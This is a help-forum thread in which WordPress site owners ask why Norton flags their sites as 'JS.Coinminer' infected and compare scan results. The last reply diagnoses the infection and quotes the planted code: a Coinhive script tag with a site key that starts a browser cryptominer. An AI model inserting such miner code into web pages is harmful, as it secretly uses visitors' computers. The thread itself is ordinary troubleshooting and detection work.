Advanced Threat Protection

Norton Security blocks me from browsing (Chrome) of my websites which it says is infected with “JS.Coinminer Download 6” and “JS.Coinminer Download 8” (images of alerts below FYI).

I have used Sourcetree (Bitbucket) to clone the Word Press folder of this website and run a scan of Norton Security on this folder. The Norton Security scan initially took over 12 hours and was still running in the morning. After contcating Norton Support they restarted DNS and finally ran another scan of the GIT folder which said it was clean…which was a little weird considering it should have showed some sort of infection…

Now im suspecting Norton Security is giving a “false” positive based on its signature of the JSCoinminer threat (which I think includes redirects). I have yet to confirm this but have lodged a second level issue with Norton as  first level was unable to give me any more details (after 2 hours and three support remote sessions…).

Does anyone know why this JSCoinminer Download 6 and 8 might be flagging my website? Any help appreciated.

What file is it flagging?

Also for Norton products, they have a community here:

https://us.norton.com/community

Symantec is specific to enterprise products.

Hi Brian, thx. 

Its apparently flagging a couple of files in a non-existent directory according to my developers...

My Norton Security product doesnt tell me there is an infection anymore when I try to view it with Chrome, but it does say there is a threat warning when I use Mozilla Firefox! WTF?

Norton Websafe webpage indicates the infection is there but located in the USA (where our previous web host server was located) but we have moved it to Australia last week so this info may be old.... https://safeweb.norton.com/report/show?url=https%3A%2F%2Fwww.urbanmarketing.com.au and shows the files are as follows

I have the exact same problem. Norton is flagging a Wordpress site I manage saying that it is blocking an attack from "JS Coinminer Download 6". This only started about a week ago (give or take). My site has 2 sections, one built using Wordpress and another section is not.  Norton only flags when I visit the wordpress section of my site.

I am using Chrome, . 

My wordpress site has ongoing malware scan , it has reported no infection.  I have also asked the hosting company to do a manual scan twice already, still no infection found. 

Very annoying not know if this is indeed a false negative from Norton.

I submitted a report to Norton asking them to verify if this is a false negative, haven't heard any update yet. 

I am attaching a screen shot of the pop up that flags JScoinminer being blocked.

Excellent post ! Very interesting topic. :)

PUA.Jscoinminer is on a lot of websites and a lot more on word press. The file Scans are only scanning your area not the entire server. it is the cloud anything can happen.

I accessed your website through one of the URLs mentioned;

http://www.urbanmarketing.com.au/case/images/quicksilver_front.jpg

and although I got 404 - not found for this file, the web content for the error page

DID Contain some suspicious file. When looking into this file there were several

indications that this was indeed suspect;

It _was_ JS (javascript) and _did_ contain references to  "coinhive.com"

It looks like your'e infected.

Here's a code snippet; (from your web page/site)

<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
var miner = new CoinHive.User('OYVj9VafS1hMApLflmS9CmX0pkxg9wKN', 'urbanmarketing.com.au');
miner.start();